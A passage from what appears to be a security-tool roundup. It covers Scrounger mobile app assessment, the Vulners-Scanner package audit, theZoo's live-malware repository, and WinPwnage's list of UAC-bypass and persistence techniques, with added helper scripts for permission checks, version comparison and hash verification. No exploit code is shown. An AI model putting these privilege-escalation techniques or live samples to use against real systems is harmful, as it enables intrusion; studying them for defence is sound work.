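    return {p.strip() for p in option_value.split(";") if p.strip()}


def requested_permissions(manifest_xml):
    """Every permission the manifest requests (both uses-permission forms)."""
    root = ET.fromstring(manifest_xml)
    names = []
    for tag in ("uses-permission", "uses-permission-sdk-23"):
        for el in root.iter(tag):
            name = el.get("{%s}name" % ANDROID_NS)
            if name:
                names.append(name)
    return names


def check_permissions(manifest_xml, dangerous=DEFAULT_DANGEROUS):
    """Intersection of requested and dangerous permissions, shaped like the
    module's result: report is True only when something was found."""
    wanted = parse_dangerous(dangerous)
    found = sorted(p for p in requested_permissions(manifest_xml) if p in wanted)
    return {
        "title": "The Application Has Inadequate Permissions",
        "report": bool(found),
        "details": found,
    }


def format_result(result):
    """Render the result the way the scrounger console prints it."""
    lines = [result["title"], "    Report: %s" % result["report"], "    Details:"]
    lines += ["* %s" % p for p in result["details"]]
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_result(check_permissions(SAMPLE_MANIFEST)))
```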

Using devices

$ scrounger-console
Starting Scrounger console...

> show devices

Added Devices:

    Scrounger ID Device OS Identifier
    ------------ --------- ----------

> add_device
android  ios

> add_device android 00cd7e67ec57c127

> show devices

Added Devices:

    Scrounger ID Device OS Identifier
    ------------ --------- ----------
    1            android   00cd7e67ec57c127

> set global device 1

> options

Global Options:

    Name   Value
    ----   -----
    device 1
    output /tmp/scrounger-app

> use misc/list_apps

misc/list_apps > options

Global Options:

    Name   Value
    ----   -----
    device 1
    output /tmp/scrounger-app

Module Options (misc/list_apps):

    Name   Required Description            Current Setting
    ----   -------- -----------            ---------------
    output False    local output directory /tmp/scrounger-app
    device True     the remote device      1

misc/list_apps > unset output

misc/list_apps > options

Global Options:

    Name   Value
    ----   -----
    device 1
    output /tmp/scrounger-app

Module Options (misc/list_apps):

    Name   Required Description            Current Setting
    ----   -------- -----------            ---------------
    output False    local output directory
    device True     the remote device      1

misc/list_apps > run
[+] Applications installed on 00cd7e67ec57c127:

com.android.sharedstoragebackup
com.android.providers.partnerbookmarks
com.google.android.apps.maps
com.google.android.partnersetup
de.codenauts.hockeyapp
...

Command Line Help

$ scrounger --help
usage: scrounger [-h] [-m analysis/ios/module1;analysis/ios/module2]
                 [-a argument1=value1;argument1=value2;]
                 [-f /path/to/the/app.[apk|ipa]] [-d device_id] [-l] [-o]
                 [-p /path/to/full-analysis.json] [-V] [-D]

   _____
  / ____|
 | (___   ___ _ __ ___  _   _ _ __   __ _  ___ _ __
  \___ \ / __| '__/ _ \| | | | '_ \ / _` |/ _ \ '__|
  ____) | (__| | | (_) | |_| | | | | (_| |  __/ |
 |_____/ \___|_|  \___/ \__,_|_| |_|\__, |\___|_|
                                     __/ |
                                    |___/

optional arguments:
  -h, --help            show this help message and exit
  -m analysis/ios/module1;analysis/ios/module2, --modules analysis/ios/module1;analysis/ios/module2
                        modules to be run - seperated by ; - will be run in order
  -a argument1=value1;argument1=value2;, --arguments argument1=value1;argument1=value2;
                        arguments for the modules to be run
  -f /path/to/the/app.[apk|ipa], --full-analysis /path/to/the/app.[apk|ipa]
                        runs a full analysis on the application
  -d device_id, --device device_id
                        device to be used by the modules
  -l, --list            list available devices and modules
  -o, --options         prints the required options for the selected modules
  -p /path/to/full-analysis.json, --print-results /path/to/full-analysis.json
                        prints the results of a full analysis json file
  -V, --verbose         prints more information when running the modules
  -D, --debug           prints more information when running scrounger

Using the command line

$ scrounger -o -m "misc/android/decompile_apk"

Module Options (misc.android.decompile_apk):

    Name   Required Description                Default
    ----   -------- -----------                -------
    output True     local output directory     None
    apk    True     local path to the APK file None

$ scrounger -m "misc/android/decompile_apk" -a "apk=./a.apk;output=./cli-demo"
Excuting Module 0
2018-05-01 11:17:42 -                  decompile_apk : Creating decompilation directory
2018-05-01 11:17:42 -                  decompile_apk : Decompiling application
2018-05-01 11:17:46 -                       manifest : Checking for AndroidManifest.xml file
2018-05-01 11:17:46 -                       manifest : Creating manifest object
[+] Application decompiled to ./cli-demo/com.eg.challengeapp.decompiled

Disclaimer

All findings identified by Scrounger should be manually double checked before they are reported. When using modules that need an Android or iOS device, Scrounger requires a rooted or jailbroken device respectively.

Vulners-Scanner : Vulnerability Scanner Based On Vulners.com Audit API

Vulners-Scanner is a PoC host-based vulnerability scanner that uses the vulners.com API. It detects the operating system, collects the installed packages and checks them for known vulnerabilities. It currently supports collecting packages for Debian-based (debian, kali) and RHEL-based (redhat, centos, fedora) operating systems.

Detection of vulnerabilities in running docker containers is experimental and only available in the advanced script; enable it by changing checkDocker=False to checkDocker=True in linuxScanner.py.


How To Use Vulners-Scanner

  • Lazy scanner: the simplest script, which just shows the vulners.com API capabilities. Run it and it returns all vulnerabilities found:
# git clone https://github.com/videns/vulners-scanner
# cd vulners-scanner
# ./lazyScanner.py
OS Name - debian, OS Version - 8
Total provided packages: 315
{
    "data": {
        "vulnerabilities": [
            "DSA-3644",
            "DSA-3626"
        ],
        "packages": {
            "openssh-client 1:6.7p1-5+deb8u2 amd64": {
                "DSA-3626": [
                    {
                        "bulletinVersion": "1:6.7p1-5+deb8u3",
                        "providedVersion": "1:6.7p1-5+deb8u2",
                        "bulletinPackage": "openssh-client_1:6.7p1-5+deb8u3_all.deb",
                        "result": true,
                        "operator": "lt",
                        "OSVersion": "8",
                        "providedPackage": "openssh-client 1:6.7p1-5+deb8u2 amd64"
                    }
                ]
            },
            "fontconfig-config 2.11.0-6.3 all": {
                "DSA-3644": [
                    {
                        "bulletinVersion": "2.11.0-6.3+deb8u1",
                        "providedVersion": "2.11.0-6.3",
                        "bulletinPackage": "fontconfig-config_2.11.0-6.3+deb8u1_all.deb",
                        "result": true,
                        "operator": "lt",
                        "OSVersion": "8",
                        "providedPackage": "fontconfig-config 2.11.0-6.3 all"
                    }
                ]
            },
            "libfontconfig1 2.11.0-6.3 amd64": {
                "DSA-3644": [
                    {
                        "bulletinVersion": "2.11.0-6.3+deb8u1",
                        "providedVersion": "2.11.0-6.3",
                        "bulletinPackage": "libfontconfig1_2.11.0-6.3+deb8u1_all.deb",
                        "result": true,
                        "operator": "lt",
                        "OSVersion": "8",
                        "providedPackage": "libfontconfig1 2.11.0-6.3 amd64"
                    }
                ]
            }
        }
    },
    "result": "OK"
}
Vulnerabilities:
DSA-3644
DSA-3626
  • Advanced scanner: detects the OS in several ways and supports scanning running docker containers (must be enabled manually in linuxScanner.py):
# git clone https://github.com/videns/vulners-scanner
# cd vulners-scanner
# ./linuxScanner.py

             _
__   ___   _| |_ __   ___ _ __ ___
\ \ / / | | | | '_ \ / _ \ '__/ __|
 \ V /| |_| | | | | |  __/ |  \__ \
  \_/  \__,_|_|_| |_|\___|_|  |___/

==========================================
Host info - Host machine
OS Name - Darwin, OS Version - 15.6.0
Total found packages: 0
==========================================
Host info - docker container "java:8-jre"
OS Name - debian, OS Version - 8
Total found packages: 166
Vulnerable packages:
    libgcrypt20 1.6.3-2+deb8u1 amd64
        DSA-3650 - 'libgcrypt20 -- security update', cvss.score - 0.0
    libexpat1 2.1.0-6+deb8u2 amd64
        DSA-3597 - 'expat -- security update', cvss.score - 7.8
    perl-base 5.20.2-3+deb8u4 amd64
        DSA-3628 - 'perl -- security update', cvss.score - 0.0
    gnupg 1.4.18-7+deb8u1 amd64
        DSA-3649 - 'gnupg -- security update', cvss.score - 0.0
    gpgv 1.4.18-7+deb8u1 amd64
        DSA-3649 - 'gnupg -- security update', cvss.score - 0.0
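Every hit in the JSON above is a version test: the API reports "result": true when providedVersion is less than ("operator": "lt") the bulletinVersion that fixes the issue, using Debian's dpkg version ordering (epoch, upstream, revision, with "~" sorting before anything). The following is an added example, not vulners-scanner's own code: it re-implements that comparison so a reviewer can re-check a reported hit locally instead of trusting the "result" flag, and runs it over a report constructed from the page's lazyScanner.py output plus one constructed package that is already at the fixed version and must therefore not match.

```python
"""Re-evaluate a vulners.com package-audit response with dpkg version ordering.

Added example, not part of the vulners-scanner project. SAMPLE_REPORT is
constructed from the page's lazyScanner.py output; the libfontconfig1 entry
is altered to the already-fixed version to show a non-match.
"""


def _order(ch):
    """dpkg character weight: '~' sorts before everything, even end of string."""
    if ch == "~":
        return -1
    if ch.isalpha():
        return ord(ch)
    return ord(ch) + 256            # '+', '.', '-' etc. sort after letters


def _cmp_nondigit(a, b):
    """Compare two non-digit runs; end of string has weight 0."""
    for i in range(max(len(a), len(b))):
        wa = _order(a[i]) if i < len(a) else 0
        wb = _order(b[i]) if i < len(b) else 0
        if wa != wb:
            return -1 if wa < wb else 1
    return 0


def _run(s, i, digits):
    """Longest run starting at s[i] made of digits (digits=True) or non-digits."""
    j = i
    while j < len(s) and s[j].isdigit() == digits:
        j += 1
    return s[i:j]


def _cmp_fragment(a, b):
    """Compare an upstream or revision string: alternate non-digit and digit runs."""
    ia = ib = 0
    while ia < len(a) or ib < len(b):
        na, nb = _run(a, ia, False), _run(b, ib, False)
        r = _cmp_nondigit(na, nb)
        if r:
            return r
        ia, ib = ia + len(na), ib + len(nb)
        da, db = _run(a, ia, True), _run(b, ib, True)
        ia, ib = ia + len(da), ib + len(db)
        x, y = int(da or 0), int(db or 0)   # digit runs compare numerically
        if x != y:
            return -1 if x < y else 1
    return 0


def _split(version):
    """Split '[epoch:]upstream[-revision]' into (int epoch, upstream, revision)."""
    epoch, sep, rest = version.partition(":")
    if not sep:
        epoch, rest = "0", version
    upstream, sep, revision = rest.rpartition("-")   # revision = after last '-'
    if not sep:
        upstream, revision = rest, ""
    return int(epoch), upstream, revision


def dpkg_compare(a, b):
    """Return -1, 0 or 1 with the same ordering as dpkg --compare-versions."""
    ea, ua, ra = _split(a)
    eb, ub, rb = _split(b)
    if ea != eb:
        return -1 if ea < eb else 1
    return _cmp_fragment(ua, ub) or _cmp_fragment(ra, rb)


OPERATORS = {"lt": lambda c: c < 0, "le": lambda c: c <= 0, "eq": lambda c: c == 0,
             "ge": lambda c: c >= 0, "gt": lambda c: c > 0}


def vulnerable_packages(report):
    """Map providedPackage -> sorted bulletin IDs whose version test holds.

    Each entry is re-evaluated with dpkg_compare; the API's own "result"
    flag is deliberately ignored so the two can be cross-checked.
    """
    hits = {}
    for pkg, bulletins in report["data"]["packages"].items():
        for bulletin, checks in bulletins.items():
            for chk in checks:
                cmp = dpkg_compare(chk["providedVersion"], chk["bulletinVersion"])
                if OPERATORS[chk["operator"]](cmp):
                    hits.setdefault(pkg, []).append(bulletin)
    return {k: sorted(set(v)) for k, v in hits.items()}


# Constructed sample (see module docstring); "result"/"bulletinPackage" omitted.
SAMPLE_REPORT = {"data": {"packages": {
    "openssh-client 1:6.7p1-5+deb8u2 amd64": {"DSA-3626": [
        {"providedVersion": "1:6.7p1-5+deb8u2", "bulletinVersion": "1:6.7p1-5+deb8u3", "operator": "lt"}]},
    "fontconfig-config 2.11.0-6.3 all": {"DSA-3644": [
        {"providedVersion": "2.11.0-6.3", "bulletinVersion": "2.11.0-6.3+deb8u1", "operator": "lt"}]},
    "libfontconfig1 2.11.0-6.3+deb8u1 amd64": {"DSA-3644": [
        {"providedVersion": "2.11.0-6.3+deb8u1", "bulletinVersion": "2.11.0-6.3+deb8u1", "operator": "lt"}]},
}}, "result": "OK"}

if __name__ == "__main__":
    for pkg, ids in vulnerable_packages(SAMPLE_REPORT).items():
        print(pkg, "->", ", ".join(ids))
```

Only the two packages whose installed version sorts below the bulletin version are reported; the libfontconfig1 entry at 2.11.0-6.3+deb8u1 is not, which is the check worth running when a scanner's JSON and the host's dpkg -l disagree.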

theZoo – A Repository Of LIVE Malwares For Your Own Joy & Pleasure

theZoo's purpose is to allow the study of malware: to give people interested in malware analysis access to live malware so they can analyse how it operates and, for the advanced and savvy, perhaps block specific malware within their own environment.

We recommend running the samples in a VM with no internet connection (or on an isolated internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware.

Root Files

/conf

The conf folder holds files relevant to a particular run of the program that are not part of the application itself. You can find the EULA file in conf, among others.

/imports

Contains .py and .pyc import files used by the rest of the application

/malwares/Binaries

The actual malware samples.

/malware/Source

Malware source code.


theZoo Directory Structure

Each directory is composed of 4 files:

  • Malware files in an encrypted ZIP archive.
  • SHA256 sum of the archive.
  • MD5 sum of the archive.
  • Password file for the archive.

Structure of maldb.db

maldb.db is the database theZoo uses to locate the malware indexed on your drive. Its structure is as follows:

uid,location,type,name,version,author,language,date,architecture,platform,comments,tags
  • UID – Determined during the indexing process.
  • Location – The location on the drive of the malware you have searched for.
  • Type – The category of malware. So far we sort by: Virus, Trojans, Botnets, Ransomware, Spyware.
  • Name – The name of the malware.
  • Version – The version of the malware.
  • Author – The author of the malware, if known.
  • Programming Language – Whether the entry is source or a binary and, for source, which language: c/cpp/bin…
  • Date – The date of the sample.
  • Architecture – The architecture the sample was built for. Can be x86, x64, arm7….
  • Platform – Win32, Win64, *nix32, *nix64, iOS, android and so on.
  • Comments – Any comments there may be about the item.
  • Tags – Tags matching the item.

An example line will look as follow:

104,Source/Original/Dexter,trojan,Dexter,2,unknown,c,00/05/2013,x86,win32,NULL,Source
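The two pieces above, the per-sample directory (encrypted archive plus its SHA256 and MD5 sums) and the maldb.db record that points at it, are what a handler should check before a live sample is ever extracted. The following is an added example, not theZoo's own code: it parses a maldb.db line into the documented columns, then verifies the archive under the record's location against both sum files. The file names inside a sample directory (<name>.zip, <name>.sha256, <name>.md5) are assumed for this example, since the page only describes the four files by role; the fixture it builds is a constructed placeholder blob, not malware.

```python
"""Parse a maldb.db record and verify its sample directory before handling it.

Added example, not theZoo's own code. Column order follows the maldb.db
description above; the per-sample file names (<name>.zip, <name>.sha256,
<name>.md5) are an assumption made for this example.
"""
import csv
import hashlib
import io
import os
import tempfile

FIELDS = ("uid", "location", "type", "name", "version", "author", "language",
          "date", "architecture", "platform", "comments", "tags")

# Example record taken from the page.
EXAMPLE_LINE = "104,Source/Original/Dexter,trojan,Dexter,2,unknown,c,00/05/2013,x86,win32,NULL,Source"


def parse_maldb_line(line):
    """Turn one maldb.db CSV line into a dict keyed by the documented columns."""
    row = next(csv.reader(io.StringIO(line.strip())))
    if len(row) != len(FIELDS):
        raise ValueError("expected %d columns, got %d" % (len(FIELDS), len(row)))
    rec = dict(zip(FIELDS, row))
    rec["uid"] = int(rec["uid"])
    rec["comments"] = None if rec["comments"] == "NULL" else rec["comments"]
    return rec


def verify_sample_dir(root, rec):
    """Check <root>/<location>/<name>.zip against its .sha256 and .md5 files.

    Returns (ok, {algo: (expected, actual)}). A mismatch on either digest
    means the archive is not the one indexed and must not be extracted.
    """
    d = os.path.join(root, rec["location"])
    with open(os.path.join(d, rec["name"] + ".zip"), "rb") as fh:   # assumed name
        data = fh.read()
    details = {}
    for algo in ("sha256", "md5"):
        with open(os.path.join(d, rec["name"] + "." + algo)) as fh:
            expected = fh.read().split()[0].lower()   # tolerate "<hash>  <file>" form
        details[algo] = (expected, hashlib.new(algo, data).hexdigest())
    ok = all(exp == act for exp, act in details.values())
    return ok, details


def make_fixture(tamper=False):
    """Build a temporary tree matching EXAMPLE_LINE; optionally corrupt the archive.

    Constructed fixture: the "archive" is a placeholder byte string so the
    check runs offline. Nothing here is real malware.
    """
    root = tempfile.mkdtemp()
    rec = parse_maldb_line(EXAMPLE_LINE)
    d = os.path.join(root, rec["location"])
    os.makedirs(d)
    blob = b"PK\x03\x04 constructed placeholder, not a real archive"
    base = os.path.join(d, rec["name"])
    for algo in ("sha256", "md5"):
        with open(base + "." + algo, "w") as fh:
            fh.write(hashlib.new(algo, blob).hexdigest() + "  " + rec["name"] + ".zip\n")
    if tamper:
        blob += b"\x00"          # one appended byte breaks both digests
    with open(base + ".zip", "wb") as fh:
        fh.write(blob)
    return root, rec


if __name__ == "__main__":
    root, rec = make_fixture()
    print(rec["name"], rec["type"], rec["platform"], "intact:", verify_sample_dir(root, rec)[0])
    root, rec = make_fixture(tamper=True)
    print("tampered copy intact:", verify_sample_dir(root, rec)[0])
```

Both digests are checked rather than just MD5, since MD5 alone no longer proves two archives are the same file; on a real checkout, point root at the theZoo directory and feed it lines straight from conf/maldb.db.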

Submit Malware

Get the file you want to submit and run python prep_file.py file_tosubmit.exe. It will create a directory for you. Then submit that directory along with your change to conf/maldb.db so that we know which malware it is.

Credit: Yuval Nativ, Lahad Ludar, 5fingers

WinPwnage – Elevate, UAC Bypass, Privilege Escalation, dll Hijack Techniques

WinPwnage exists to study the techniques. The techniques were found online, on different blogs and in repos here on GitHub. I do not take credit for any of the findings; thanks to all the researchers.

I rewrote them and ported them to Python 2.7. The code under the todo folders is not tested; do not expect it to work.

Techniques Implemented In WinPwnage

  • UAC bypass using fodhelper
  • UAC bypass using computerdefaults
  • UAC bypass using slui
  • UAC bypass using silentcleanup
  • UAC bypass using compmgmtlauncher
  • UAC bypass using sdclt (isolatedcommand)
  • UAC bypass using sdclt (App Paths)
  • UAC bypass using perfmon
  • UAC bypass using eventviewer
  • UAC bypass using sysprep (dll payload supported)
  • UAC bypass using migwiz (dll payload supported)
  • UAC bypass using mcx2prov (dll payload supported)
  • UAC bypass using cliconfg (dll payload supported)
  • Persistence using userinit
  • Persistence using image file execution option
  • Persistence using hklm run
  • Persistence using hkcu run
  • Persistence using schtask (SYSTEM privileges)
  • Persistence using explorer dll hijack
  • Persistence using WMI (SYSTEM privileges)


Installing Dependencies

pip install -r requirements.txt

Build

For a successful build, install the py2exe module and use the provided build.py script to compile all the scripts into a portable executable. On Windows 10, Access Denied errors can occur while compiling; rerun until it succeeds or elevate the prompt.
